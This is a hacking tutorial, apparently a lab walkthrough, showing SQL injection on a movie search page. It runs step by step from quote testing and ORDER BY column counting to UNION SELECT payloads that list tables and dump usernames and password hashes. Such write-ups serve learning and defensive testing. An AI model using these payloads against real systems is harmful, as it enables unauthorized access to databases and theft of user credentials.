SQL Injection (Search\GET)

A SQL injection attack consists of insertion or "injection" of a SQL query via the input data from the client to the application. A successful SQL injection exploit can read sensitive data from the database, modify database data (Insert/Update/Delete), execute administration operations on the database (such as shutdown the DBMS), recover the content of a given file present on the DBMS file system and in some cases issue commands to the operating system. SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to effect the execution of predefined SQL commands.


Take the example like this, here we can search for the movies

50 51
Let’s check for slqi with single quote (‘) 52 53
And we got the error now let’s proceed further. 54
With double quotes and space in between (‘ ‘) 55
All the movie result is now showing without searching for any specific movie from the database.
Now using order by find the exact no. of columns in the database.
For that we will put (1’ order by 1– -) after title= and increase the numbers of columns until we get any error. 56
title=1’ order by 1– -
title=1’ order by 2– -
title=1’ order by 3– -
title=1’ order by 4– -
title=1’ order by 5– -
title=1’ order by 6– -
title=1’ order by 7– - 57
At (8) we got the error which means there is 7 columns in the database, now move to the next step
Which is enumerating the database using (union select) 58
At columns we can print our result on are 2,3,5,4 respectively.
Let’s choose column 2 59 60
title=1' union select 1,database(),3,4,5,6,7-- -
Now extract the table names from the database. 61
title=1' union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database()-- - 62
title=1' union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database()-- -
now let’s check the users table 63
title=1' union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_name="users"-- - 64
title=1' union select 1,group_concat(login,0x3a,password),3,4,5,6,7 from users-- -
As you can see we successfully dump the username and password hash from the database.

~ Hack the World and Stay Noob

Twitter / Hack The Box / CTF Team / Teck_N00bs Community Telegram

Comments